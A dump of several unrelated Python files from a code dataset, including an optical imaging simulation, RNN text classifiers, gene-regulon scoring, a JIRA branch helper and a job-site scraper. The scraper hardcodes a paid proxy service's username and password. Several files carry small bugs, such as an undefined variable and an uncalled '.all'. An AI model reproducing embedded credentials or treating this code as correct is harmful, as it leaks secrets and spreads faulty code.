common.src.auxFunc import getIndexBand\n\nclass opticalPhase(initIsm):\n\n def __init__(self, auxdir, indir, outdir):\n super().__init__(auxdir, indir, outdir)\n\n def compute(self, sgm_toa, sgm_wv, band):\n \"\"\"\n The optical phase is in charge of simulating the radiance\n to irradiance conversion, the spatial filter (PSF)\n and the spectral filter (ISRF).\n :return: TOA image in irradiances [mW/m2/nm],\n with spatial and spectral filter\n \"\"\"\n self.logger.info(\"EODP-ALG-ISM-1000: Optical stage\")\n\n # Calculation and application of the ISRF\n # -------------------------------------------------------------------------------\n self.logger.info(\"EODP-ALG-ISM-1010: Spectral modelling. ISRF\")\n toa = self.spectralIntegration(sgm_toa, sgm_wv, band)\n\n self.logger.debug(\"TOA [0,0] \" +str(toa[0,0]) + \" [e-]\")\n\n if self.ismConfig.save_after_isrf:\n saveas_str = self.globalConfig.ism_toa_isrf + band\n\n writeToa(self.outdir, saveas_str, toa)\n # Radiance to Irradiance conversion\n # -------------------------------------------------------------------------------\n self.logger.info(\"EODP-ALG-ISM-1020: Radiances to Irradiances\")\n toa = self.rad2Irrad(toa,\n self.ismConfig.D,\n self.ismConfig.f,\n self.ismConfig.Tr)\n\n self.logger.debug(\"TOA [0,0] \" +str(toa[0,0]) + \" [e-]\")\n\n # Spatial filter\n # -------------------------------------------------------------------------------\n # Calculation and application of the system MTF\n self.logger.info(\"EODP-ALG-ISM-1030: Spatial modelling. PSF/MTF\")\n myMtf = mtf(self.logger)\n Hsys = myMtf.system_mtf(toa.shape[0], toa.shape[1],\n self.ismConfig.D, self.ismConfig.wv[getIndexBand(band)], self.ismConfig.f, self.ismConfig.pix_size,\n self.ismConfig.kLF, self.ismConfig.wLF, self.ismConfig.kHF, self.ismConfig.wHF,\n self.ismConfig.defocus, self.ismConfig.ksmear, self.ismConfig.kmotion,\n self.outdir, band)\n\n toa = self.applySysMtf(toa, Hsys) # always calculated\n\n self.logger.debug(\"TOA [0,0] \" +str(toa[0,0]) + \" [e-]\")\n\n # Write output TOA & plots\n # -------------------------------------------------------------------------------\n if self.ismConfig.save_optical_stage:\n saveas_str = self.globalConfig.ism_toa_optical + band\n\n writeToa(self.outdir, saveas_str, toa)\n\n title_str = 'TOA after the optical phase [mW/sr/m2]'\n xlabel_str='ACT'\n ylabel_str='ALT'\n plotMat2D(toa, title_str, xlabel_str, ylabel_str, self.outdir, saveas_str)\n\n idalt = int(toa.shape[0]/2)\n saveas_str = saveas_str + '_alt' + str(idalt)\n plotF([], toa[idalt,:], title_str, xlabel_str, ylabel_str, self.outdir, saveas_str)\n\n return toa\n\n def rad2Irrad(self, toa, D, f, Tr):\n \"\"\"\n Radiance to Irradiance conversion\n :param toa: Input TOA image in radiances [mW/sr/m2]\n :param D: Pupil diameter [m]\n :param f: Focal length [m]\n :param Tr: Optical transmittance [-]\n :return: TOA image in irradiances [mW/m2]\n \"\"\"\n\n TOA_I = toa*Tr*np.pi/4*((D/f)**2)\n\n return TOA_I\n\n\n def applySysMtf(self, toa, Hsys):\n \"\"\"\n Application of the system MTF to the TOA\n :param toa: Input TOA image in irradiances [mW/m2]\n :param Hsys: System MTF\n :return: TOA image in irradiances [mW/m2]\n \"\"\"\n\n toa_fft = fft2(toa)\n Hsys_shift = fftshift(Hsys)\n toa_MTF = toa_fft*Hsys_shift\n toa_ft = ifft2(toa_MTF)\n tol = np.ones(toa_ft.shape)*1e-10\n if (toa_ft.imag < tol).all:\n toa_ft = toa_ft.real\n\n\n return toa_ft\n\n\n def spectralIntegration(self, sgm_toa, sgm_wv, band):\n \"\"\"\n Integration with the ISRF to retrieve one band\n :param sgm_toa: Spectrally oversampled TOA cube 3D in irradiances [mW/m2]\n :param sgm_wv: wavelengths of the input TOA cube\n :param band: band\n :return: TOA image 2D in radiances [mW/m2]\n \"\"\"\n isrf, wv_isrf = readIsrf(self.auxdir+os.path.sep+self.ismConfig.isrffile, band)\n wv_isrf = wv_isrf*1e3 # [nm]\n\n isrf_norm = isrf/np.sum(isrf)\n toa = np.zeros((sgm_toa.shape[0],sgm_toa.shape[1]))\n\n for ialt in range(0,sgm_toa.shape[0]):\n for iact in range(0, sgm_toa.shape[1]):\n cs = interp1d(sgm_wv, sgm_toa[ialt,iact,:], fill_value=(0, 0), bounds_error=False)\n toa_interp = cs(wv_isrf)\n toa[ialt,iact] = np.sum(toa_interp*isrf_norm)\n\n return toa\n","sub_path":"ism/src/opticalPhase.py","file_name":"opticalPhase.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"15878219","text":"import numpy as np\r\nimport pandas\r\nimport tensorflow as tf\r\nimport pylab as plt\r\nimport csv\r\n\r\n\r\nMAX_DOCUMENT_LENGTH = 100\r\nHIDDEN_SIZE = 20\r\nMAX_LABEL = 15\r\nEMBEDDING_SIZE = 20\r\nbatch_size = 128\r\nis_dropout = True\r\nkeep_prob = 0.5\r\nmodel = 'lstm'\r\nlayer = 1\r\n\r\nno_epochs = 1000\r\nlr = 0.01\r\n\r\ntf.logging.set_verbosity(tf.logging.ERROR)\r\nseed = 10\r\ntf.set_random_seed(seed)\r\n\r\n\r\ndef char_rnn_model(x, is_dropout, keep_prob, model):\r\n\r\n byte_vectors = tf.one_hot(x, 256)\r\n byte_list = tf.unstack(byte_vectors, axis=1)\r\n\r\n with tf.variable_scope('RNN_1'):\r\n\r\n # choose cell type\r\n if model == 'rnn':\r\n cell_fn = tf.nn.rnn_cell.BasicRNNCell\r\n elif model == 'gru':\r\n cell_fn = tf.nn.rnn_cell.GRUCell\r\n elif model == 'lstm':\r\n cell_fn = tf.nn.rnn_cell.LSTMCell\r\n\r\n # multi-layer cell\r\n if(layer > 1):\r\n cell1 = cell_fn(HIDDEN_SIZE,reuse = tf.get_variable_scope().reuse)\r\n cell2 = cell_fn(HIDDEN_SIZE,reuse = tf.get_variable_scope().reuse)\r\n cell = tf.nn.rnn_cell.MultiRNNCell([cell1,cell2])\r\n else:\r\n cell = cell_fn(HIDDEN_SIZE)\r\n\r\n if is_dropout:\r\n cell = tf.nn.rnn_cell.DropoutWrapper(cell,input_keep_prob= keep_prob,output_keep_prob= keep_prob)\r\n\r\n _, encoding = tf.nn.static_rnn(cell, byte_list, dtype=tf.float32)\r\n\r\n if isinstance(encoding, tuple):\r\n encoding = encoding[-1]\r\n\r\n logits = tf.layers.dense(encoding, MAX_LABEL, activation=None)\r\n\r\n return logits\r\n\r\ndef word_rnn_model(x, is_dropout, keep_prob, model):\r\n\r\n word_vectors = tf.contrib.layers.embed_sequence(\r\n x, vocab_size=n_words, embed_dim=EMBEDDING_SIZE)\r\n\r\n word_list = tf.unstack(word_vectors, axis=1)\r\n\r\n with tf.variable_scope('RNN_2'):\r\n\r\n # choose cell type\r\n if model == 'rnn':\r\n cell_fn = tf.nn.rnn_cell.BasicRNNCell\r\n elif model == 'gru':\r\n cell_fn = tf.nn.rnn_cell.GRUCell\r\n elif model == 'lstm':\r\n cell_fn = tf.nn.rnn_cell.LSTMCell\r\n\r\n # multi-layer cell\r\n if(layer > 1):\r\n cell1 = cell_fn(HIDDEN_SIZE,reuse = tf.get_variable_scope().reuse)\r\n cell2 = cell_fn(HIDDEN_SIZE,reuse = tf.get_variable_scope().reuse)\r\n cell = tf.nn.rnn_cell.MultiRNNCell([cell1,cell2])\r\n else:\r\n cell = cell_fn(HIDDEN_SIZE)\r\n\r\n if is_dropout:\r\n cell = tf.nn.rnn_cell.DropoutWrapper(cell,input_keep_prob= keep_prob,output_keep_prob= keep_prob)\r\n\r\n _, encoding = tf.nn.static_rnn(cell, word_list, dtype=tf.float32)\r\n\r\n if isinstance(encoding, tuple):\r\n encoding = encoding[-1]\r\n\r\n logits = tf.layers.dense(encoding, MAX_LABEL, activation=None)\r\n\r\n return logits\r\n\r\n\r\ndef data_read_words():\r\n \r\n x_train, y_train, x_test, y_test = [], [], [], []\r\n \r\n with open('train_medium.csv', encoding='utf-8') as filex:\r\n reader = csv.reader(filex)\r\n for row in reader:\r\n x_train.append(row[2])\r\n y_train.append(int(row[0]))\r\n\r\n with open(\"test_medium.csv\", encoding='utf-8') as filex:\r\n reader = csv.reader(filex)\r\n for row in reader:\r\n x_test.append(row[2])\r\n y_test.append(int(row[0]))\r\n \r\n x_train = pandas.Series(x_train)\r\n y_train = pandas.Series(y_train)\r\n x_test = pandas.Series(x_test)\r\n y_test = pandas.Series(y_test)\r\n y_train = y_train.values\r\n y_test = y_test.values\r\n \r\n vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(\r\n MAX_DOCUMENT_LENGTH)\r\n\r\n x_transform_train = vocab_processor.fit_transform(x_train)\r\n x_transform_test = vocab_processor.transform(x_test)\r\n\r\n x_train = np.array(list(x_transform_train))\r\n x_test = np.array(list(x_transform_test))\r\n\r\n no_words = len(vocab_processor.vocabulary_)\r\n print('Total words: %d' % no_words)\r\n\r\n return x_train, y_train, x_test, y_test, no_words\r\n\r\ndef read_data_chars():\r\n \r\n x_train, y_train, x_test, y_test = [], [], [], []\r\n\r\n with open('train_medium.csv', encoding='utf-8') as filex:\r\n reader = csv.reader(filex)\r\n for row in reader:\r\n x_train.append(row[1])\r\n y_train.append(int(row[0]))\r\n\r\n with open('test_medium.csv', encoding='utf-8') as filex:\r\n reader = csv.reader(filex)\r\n for row in reader:\r\n x_test.append(row[1])\r\n y_test.append(int(row[0]))\r\n \r\n x_train = pandas.Series(x_train)\r\n y_train = pandas.Series(y_train)\r\n x_test = pandas.Series(x_test)\r\n y_test = pandas.Series(y_test)\r\n \r\n \r\n char_processor = tf.contrib.learn.preprocessing.ByteProcessor(MAX_DOCUMENT_LENGTH)\r\n \r\n x_train = np.array(list(char_processor.fit_transform(x_train)))\r\n x_test = np.array(list(char_processor.transform(x_test)))\r\n y_train = y_train.values\r\n y_test = y_test.values\r\n \r\n return x_train, y_train, x_test, y_test\r\n\r\n\r\ndef read_data(case):\r\n x_train, y_train, x_test, y_test = [], [], [], []\r\n n_words = 0\r\n\r\n if(case == 'rnn-char'):\r\n x_train, y_train, x_test, y_test = read_data_chars()\r\n elif(case == 'rnn-word'):\r\n x_train, y_train, x_test, y_test, n_words = data_read_words()\r\n\r\n return x_train, y_train, x_test, y_test, n_words\r\n\r\ndef rnn_call(case, x, is_dropout, keep_prob, model):\r\n logits = None\r\n\r\n if(case == 'rnn-char'):\r\n logits = char_rnn_model(x, is_dropout, keep_prob, model)\r\n elif(case == 'rnn-word'):\r\n logits = word_rnn_model(x, is_dropout, keep_prob, model)\r\n \r\n return logits\r\n\r\ndef main():\r\n global n_words\r\n\r\n list_case = ['rnn-char','rnn-word']\r\n all_test_acc = []\r\n \r\n for c,k in enumerate(list_case):\r\n print(k)\r\n x_train, y_train, x_test, y_test, n_words = read_data(k)\r\n\r\n # Create the model\r\n x = tf.placeholder(tf.int64, [None, MAX_DOCUMENT_LENGTH])\r\n y_ = tf.placeholder(tf.int64)\r\n keep_prob = tf.placeholder(tf.float32)\r\n\r\n logits = rnn_call(k,x, is_dropout, keep_prob, model)\r\n\r\n entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=tf.one_hot(y_, MAX_LABEL), logits=logits))\r\n train_op = tf.train.AdamOptimizer(lr).minimize(entropy)\r\n\r\n correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(tf.one_hot(y_, MAX_LABEL),1))\r\n correct_prediction = tf.cast(correct_prediction, tf.float32)\r\n accuracy = tf.reduce_mean(correct_prediction)\r\n\r\n N = len(x_train)\r\n idx = np.arange(N)\r\n\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n\r\n test_acc = []\r\n\r\n \r\n for i in range(no_epochs):\r\n np.random.shuffle(idx)\r\n trainX, trainY = x_train[idx], y_train[idx]\r\n\r\n for start, end in zip(range(0, N, batch_size), range(batch_size, N, batch_size)):\r\n sess.run(train_op, {x: trainX[start:end], y_: trainY[start:end], keep_prob: 0.7})\r\n \r\n test_acc_ = sess.run(accuracy, {x: x_test, y_: y_test, keep_prob: 1.0})\r\n test_acc.append(test_acc_)\r\n \r\n print('iter: %d, testacc: %g'%(i, test_acc[i]))\r\n \r\n\r\n all_test_acc.append(test_acc)\r\n \r\n\r\n plt.figure(1)\r\n plt.plot(range(no_epochs), all_test_acc[0], label = 'rnn-char')\r\n plt.plot(range(no_epochs), all_test_acc[1], label = 'rnn-word')\r\n plt.legend(loc='lower right')\r\n plt.xlabel(str(no_epochs) + ' iterations')\r\n plt.ylabel('test accuracy')\r\n plt.title('test accuracy vs. epochs (LSTM)')\r\n\r\n \r\n plt.show()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"Assignment 2/partb_6_1_b.py","file_name":"partb_6_1_b.py","file_ext":"py","file_size_in_byte":7342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"265172992","text":"import pandas as pd\nimport numpy as np\nimport scanpy as sc\nfrom anndata import AnnData\nimport pickle\nimport pkg_resources\n\n\ndef load_regulons(levels=['A', 'B', 'C', 'D', 'E'], organism='Human'):\n # Get package path\n if organism == \"Human\":\n path = pkg_resources.resource_filename(__name__, 'data/dorothea_hs.pkl')\n elif organism == \"Mouse\":\n path = pkg_resources.resource_filename(__name__, 'data/dorothea_mm.pkl')\n else:\n raise(\"Wrong organism name. Please specify 'Human' or 'Mouse'.\")\n \n # Open pickle object\n df = pickle.load(open(path, \"rb\" ))\n \n #Filter by levels of confidence\n df = df[df['confidence'].isin(levels)]\n \n # Transform to binary dataframe\n dorothea_df = df.pivot(index='target', columns='tf', values='mor')\n \n # Set nans to 0\n dorothea_df[np.isnan(dorothea_df)] = 0\n \n return dorothea_df\n\ndef extract(data, obsm_key='dorothea'):\n obsm = data.obsm\n obs = data.obs\n df = data.obsm['dorothea']\n var = pd.DataFrame(index=df.columns)\n tadata = AnnData(np.array(df), obs=obs, var=var, obsm=obsm)\n return tadata\n \n\ndef process_input(data, use_raw=False):\n if isinstance(data, AnnData):\n if not use_raw:\n genes = np.array(data.var.index)\n idx = np.argsort(genes)\n genes = genes[idx]\n samples = data.obs.index\n X = data.X[:,idx]\n else:\n genes = np.array(data.raw.var.index)\n idx = np.argsort(genes)\n genes = genes[idx]\n samples= data.raw.obs_names\n X = data.raw.X[:,idx]\n elif isinstance(data, pd.DataFrame):\n genes = np.array(df.columns)\n idx = np.argsort(genes)\n genes = genes[idx]\n samples = df.index\n X = np.array(df)[:,idx]\n else:\n raise ValueError('Input must be AnnData or pandas DataFrame.')\n return genes, samples, X\n\n\ndef run(data, regnet, center=True, scale=True, inplace=True, use_raw=False):\n # Get genes, samples/tfs and matrices from data and regnet\n x_genes, x_samples, X = process_input(data, use_raw=use_raw)\n\n assert len(x_genes) == len(set(x_genes)), 'Gene names are not unique'\n\n if X.shape[0] <= 1 and (center or scale):\n raise ValueError('If there is only one observation no centering nor scaling can be performed.')\n\n # Sort targets (rows) alphabetically\n regnet = regnet.sort_index()\n r_targets, r_tfs = regnet.index, regnet.columns\n\n assert len(r_targets) == len(set(r_targets)), 'regnet target names are not unique'\n assert len(r_tfs) == len(set(r_tfs)), 'regnet tf names are not unique'\n\n # Subset by common genes\n common_genes = np.sort(list(set(r_targets) & set(x_genes)))\n\n target_fraction = len(common_genes) / len(r_targets)\n assert target_fraction > .05, f'Too few ({len(common_genes)}) target genes found. Make sure you are using the correct organism.'\n\n print(f'{len(common_genes)} targets found')\n\n idx_x = np.searchsorted(x_genes, common_genes)\n X = X[:,idx_x]\n R = regnet.loc[common_genes].values\n\n if center:\n X = X - np.mean(X, axis=0)\n\n # Run matrix mult\n result = np.asarray(X.dot(R))\n\n if scale:\n std = np.std(result, ddof=1, axis=0)\n std[std == 0] = 1\n result = (result - np.mean(result, axis=0)) / std\n\n # Remove nans\n result[np.isnan(result)] = 0\n\n # Store in df\n result = pd.DataFrame(result, columns=r_tfs, index=x_samples)\n\n if isinstance(data, AnnData) and inplace:\n # Update AnnData object\n data.obsm['dorothea'] = result\n else:\n # Return dataframe object\n data = result\n\n return data if not inplace else None\n","sub_path":"dorothea/dorothea.py","file_name":"dorothea.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236284387","text":"from audiobook import Audiobook\nfrom book import Book\nfrom bookmark_reader import BookmarkReader\nfrom downloader import Downloader\nfrom page import Page\n\n\ndef is_audiobook(page):\n found = page.find('Audio ')\n return found > 0\n\n\ndef get_book(first_page):\n if is_audiobook(first_page):\n book = Audiobook(first_page)\n else:\n book = Book(first_page)\n return book\n\n\nclass Reader(object):\n def __init__(self, bookmark):\n self.book_name = bookmark.name\n self.book_address = bookmark.address\n self.book = None\n\n def read(self):\n with Downloader() as downloader:\n first_page = Page(downloader.get(self.book_address))\n self.book = get_book(first_page)\n self.book.read(downloader)\n\n def save(self, path):\n self.book.save(path)\n\n\nif __name__ == \"__main__\":\n for bookmark in BookmarkReader().bookmarks:\n reader = Reader(bookmark)\n reader.read()\n reader.save('downloads')\n","sub_path":"reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"545810440","text":"import random\nimport math\n\nfrom code.algorithms.hillclimber import hillclimber\n\n\nclass simulated_annealing(hillclimber):\n \"\"\"\n The SimulatedAnnealing class that randomly reattaches a group of houses' cables. \n Improvements or equivalent solutions are kept for the next iteration.\n Worse solutions are sometimes kept, depending on the temperature.\n \"\"\"\n def __init__(self, grid, temperature=1):\n # Use the init of the Hillclimber class\n super().__init__(grid)\n\n # Starting temperature and current temperature\n self.T0 = temperature\n self.T = temperature\n\n def update_temperature(self):\n \"\"\"\n This function implements a *exponential* cooling scheme.\n Alpha can be any value below 1 but above 0.\n Temperature will become zero after all iterations passed to the run()\n method have passed.\n \"\"\"\n alpha = 0.99\n self.T = self.T * alpha\n\n def check_solution(self, new_grid):\n \"\"\"\n Checks and accepts better solutions than the current solution.\n Also sometimes accepts solutions that are worse, depending on the current\n temperature.\n \"\"\"\n new_cost = self.calculate_cost(new_grid)\n old_cost = self.calculate_cost(self.grid)\n\n # Calculate the probability of accepting this new grid\n delta = new_cost - old_cost\n probability = math.exp(-delta / self.T)\n\n # Pull a random number between 0 and 1 and see if we accept the graph!\n if random.random() < probability:\n self.no_improvement = 0\n self.grid = new_grid\n self.cost = new_cost\n print(f\"Accepted a different solution: {self.cost}!\")\n else:\n self.no_improvement += 1\n\n # Update the temperature\n self.update_temperature()\n","sub_path":"code/algorithms/sim_anneal.py","file_name":"sim_anneal.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311833361","text":"from .common import menu, addparents, AllBranches\nfrom lagoon import git\nimport sys, subprocess, os, tempfile, re\n\nwordpattern = re.compile(r'[^\\s/]+')\n\ndef main_mkbranch():\n 'Create a branch for the given ticket(s) named according to git policy.'\n tickets = sys.argv[1:]\n with tempfile.NamedTemporaryFile() as cookiesfile:\n subprocess.run([os.path.join(os.path.dirname(__file__), 'extract_cookies.sh')], stdout = cookiesfile, check = True)\n wget = subprocess.Popen(['wget', '-O', '-', \"%s/browse/%s\" % (os.environ['JIRA_URL'], tickets[0]), '--load-cookies', cookiesfile.name], stdout = subprocess.PIPE)\n words = [w.lower() for w in wordpattern.findall(subprocess.run([os.path.join(os.environ['GOPATH'], 'bin', 'pup'), 'h1 text{}'], stdin = wget.stdout, stdout = subprocess.PIPE).stdout.decode())]\n wget.wait()\n prefix = ''.join(\"%s_\" % t.translate({ord('-'): None}).lower() for t in tickets)\n options = [prefix + '_'.join(words[:i + 1]) for i in range(len(words))]\n _, name = menu([[o, ''] for o in options], 'Branch name')\n _, base = menu([[n, ''] for n in AllBranches().names], 'From')\n git.checkout._b.print(name, base)\n addparents(name, base)\n","sub_path":"dev_bin/mkbranch.py","file_name":"mkbranch.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"447019150","text":"\"\"\" \n@Author: huuuuusy\n@GitHub: https://github.com/huuuuusy\n系统: Ubuntu 18.04\nIDE: VS Code\n工具: python3\n\"\"\"\n\n\"\"\"\n实验9-1:文件读取\n\"\"\"\n#!/usr/bin/env python3\nname = input(\"Enter the file name: \")\nfobj = open(name)\nprint(fobj.read())\nfobj.close()","sub_path":"Language/Python3/SYL-Python3/exp9-文件处理/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"288312180","text":"from schnorr_dss import *\n\n\ndef main() -> None:\n m = b'hello, world'\n sk, pk = gen_key()\n print(sk, pk)\n\n sig = sign(m, sk)\n print(sig)\n\n m1 = b'hello, world1'\n print(verify(m, pk, sig))\n print(verify(m1, pk, sig))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"schnorr_dss_test.py","file_name":"schnorr_dss_test.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353338530","text":"import scrapy\nfrom scrapy.selector import Selector\nimport requests\nimport time\nimport requests\nfrom kanzhun_search.items import KanzhunSearchItem\n\nheaders = {\"User-Agent\": \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\"}\n\nproxyHost = \"proxy.abuyun.com\"\nproxyPort = \"9020\"\n\nproxyUser = \"H020G39R1142524D\"\nproxyPass = \"E440F4C798A80714\"\n\nproxyMeta = \"http://%(user)s:%(pass)s@%(host)s:%(port)s\" % {\n \"host\": proxyHost,\n \"port\": proxyPort,\n \"user\": proxyUser,\n \"pass\": proxyPass,\n}\n\nproxies = {\n \"http\": proxyMeta,\n \"https\": proxyMeta,\n}\n\ndef clean(x):\n x = str(x)\n x = x.replace('\\\\r', '').replace('\\\\t', '').replace('\\\\n', '').replace('\"', '').replace(\" \", \"\").replace(\"|\",\"\").replace('[','').replace(']','').replace(\"'\",'').replace(',','').replace('\\n','').replace('\\t','').replace('\\r','')\n return x\n\nclass KanzhunSearchSpider(scrapy.Spider):\n name = 'kanzhun_search'\n allowed_domain = 'http://www.kanzhun.com'\n page = 1\n\n def start_requests(self):\n\n for type in [116,119,5,4,65,64,62,54,53,57,56,60,55]:\n\n url = 'http://www.kanzhun.com/jobli_' +str(type) +'-t_0-e_0-d_0-s_0-j_0-k_0/p1/?q=%s&ka=paging1'\n yield scrapy.Request(url % self.searchword, callback= self.parse_page)\n\n def parse_page(self,response):\n\n sel = Selector(response)\n titles = sel.xpath('//div[@class=\"sparrow\"]/dl/dd')\n\n for title in titles:\n\n item = KanzhunSearchItem()\n item['positionName'] = clean(title.xpath('h3/a//text()').extract())\n item['salary'] = clean(title.xpath('p[@class=\"request grey_99\"]/b[@class=\"salary\"]/text()').extract())\n item['description'] = clean(title.xpath('p[@class=\"company_advantage\"]/text()').extract())\n item['job_loc'] = clean(title.xpath('p[@class=\"request grey_99\"]/span[@class=\"city\"]/text()').extract())\n # print(title.xpath('p[@class=\"request grey_99\"]/text()').extract())\n item['job_suffer'] = clean(title.xpath('p[@class=\"request grey_99\"]/text()').extract()[2])\n item['job_edu'] = clean(title.xpath('p[@class=\"request grey_99\"]/text()').extract()[3])\n item['job_type'] = clean(title.xpath('p[@class=\"request grey_99\"]/text()').extract()[4])\n item['job_time'] = clean(title.xpath('p[@class=\"request grey_99\"]/text()').extract()[5])\n\n\n\n item['companyFullName'] = clean(title.xpath('p[@class=\"jieshao\"]/a/text()').extract())\n\n if title.xpath('p[@class=\"jieshao\"]/a/@href').extract():\n\n co_url = 'http://www.kanzhun.com' + title.xpath('p[@class=\"jieshao\"]/a/@href').extract()[0]\n co_page = requests.get(co_url, headers = headers, proxies=proxies)\n # co_page = requests.get(co_url, headers = headers)\n co_sel = Selector(co_page)\n\n try:\n # print(co_sel.xpath('//div[@class=\"bw_explain\"]/text()'))\n item['industryField'] = clean(co_sel.xpath('//div[@class=\"bw_explain\"]/span[1]/text()').extract())\n item['co_loc'] = clean(co_sel.xpath('//div[@class=\"bw_explain\"]/span[2]/text()').extract())\n item['companySize'] = clean(co_sel.xpath('//div[@class=\"bw_explain\"]/span[last()]/text()').extract())\n item['co_des'] = clean(co_sel.xpath('//div[@class=\"bw_brief\"]/text()').extract())\n\n except:\n print('shit company')\n\n yield item\n\n next_page = sel.xpath('//a[@class=\"p_next\"]/@href')\n\n if next_page:\n\n next_page = 'http://www.kanzhun.com' +next_page.extract()[0]\n self.page += 1\n print('go {} page'.format(self.page))\n yield scrapy.Request(next_page, callback= self.parse_page)\n\n else:\n print('No next pages, nigga!!\\n')\n\n","sub_path":"theproduct/qinzhihao/search/spider_kanzhun_search/kanzhun_search/spiders/kanzhun_search.py","file_name":"kanzhun_search.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"53698595","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 18 00:46:41 2021\n\n@author: MaxiT\n\"\"\"\nimport numpy as np\nfrom sklearn import model_selection\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import roc_curve\nimport torch\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import confusion_matrix\n\n\ndef plot_confusion_matrix(cm,\n target_names,\n title='Confusion matrix',\n cmap=None,\n normalize=True):\n \"\"\"\n given a sklearn confusion matrix (cm), make a nice plot\n\n Arguments\n ---------\n cm: confusion matrix from sklearn.metrics.confusion_matrix\n\n target_names: given classification classes such as [0, 1, 2]\n the class names, for example: ['high', 'medium', 'low']\n\n title: the text to display at the top of the matrix\n\n cmap: the gradient of the values displayed from matplotlib.pyplot.cm\n see http://matplotlib.org/examples/color/colormaps_reference.html\n plt.get_cmap('jet') or plt.cm.Blues\n\n normalize: If False, plot the raw numbers\n If True, plot the proportions\n\n Usage\n -----\n plot_confusion_matrix(cm = cm, # confusion matrix created by\n # sklearn.metrics.confusion_matrix\n normalize = True, # show proportions\n target_names = y_labels_vals, # list of names of the classes\n title = best_estimator_name) # title of graph\n\n Citiation\n ---------\n http://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html\n\n \"\"\"\n import matplotlib.pyplot as plt\n import numpy as np\n import itertools\n\n accuracy = np.trace(cm) / float(np.sum(cm))\n misclass = 1 - accuracy\n\n if cmap is None:\n cmap = plt.get_cmap('Blues')\n\n plt.figure()\n plt.grid(False)\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n\n if target_names is not None:\n tick_marks = np.arange(len(target_names))\n plt.xticks(tick_marks, target_names, rotation=45)\n plt.yticks(tick_marks, target_names)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n\n thresh = cm.max() / 1.5 if normalize else cm.max() / 2\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n if normalize:\n plt.text(j, i, \"{:0.4f}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n else:\n plt.text(j, i, \"{:,}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label\\naccuracy={:0.4f}; misclass={:0.4f}'.format(accuracy, misclass))\n plt.show()\n \n\n\nclass CustomDataset(Dataset):\n def __init__(self, X, Y):\n self.X=X\n self.Y=Y\n \n def __len__(self):\n return self.X.shape[0]\n \n def __getitem__(self, idx):\n return self.X[idx,:], self.Y[idx]\n \n\nclass TestCustomDataset(Dataset):\n def __init__(self, X):\n self.X=X\n \n def __len__(self):\n return self.X.shape[0]\n \n def __getitem__(self, idx):\n return self.X[idx,:]\n\n\nclass NNetLayers(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.linear_1 = torch.nn.Linear(in_features=2, out_features=10, bias = True)\n self.activation_1 = torch.nn.ReLU()\n self.dropout_1= torch.nn.Dropout(p=0.05)\n self.linear_2 = torch.nn.Linear(in_features=10, out_features=20, bias = True)\n self.activation_2 = torch.nn.ReLU()\n self.dropout_2= torch.nn.Dropout(p=0.05)\n self.linear_3 = torch.nn.Linear(in_features=20, out_features=1, bias = True)\n self.activation_3 = torch.nn.Sigmoid()\n\n def forward(self, x):\n # X es el batch que va a entrar\n z1 = self.linear_1(x)\n a1 = self.activation_1(z1)\n d1 = self.dropout_1(a1)\n z2 = self.linear_2(d1)\n a2 = self.activation_2(z2)\n d2 = self.dropout_2(a2)\n z3 = self.linear_3(d2)\n y = self.activation_3(z3)\n return y\n \n \nclass NnetBinaryClass():\n \n def __init__(self):\n self.nnet = NNetLayers()\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n pass\n \n \n def fit(self,x_train, y_train, x_valid=None, y_valid=None, \\\n batch_size = 32, lr=0.001, epochs=50, verbose=True):\n \n training_set = CustomDataset(x_train, y_train)\n training_dataloader = DataLoader(training_set,batch_size=batch_size, \\\n shuffle=True)\n \n if (x_valid is not None) & (y_valid is not None):\n valid_set = 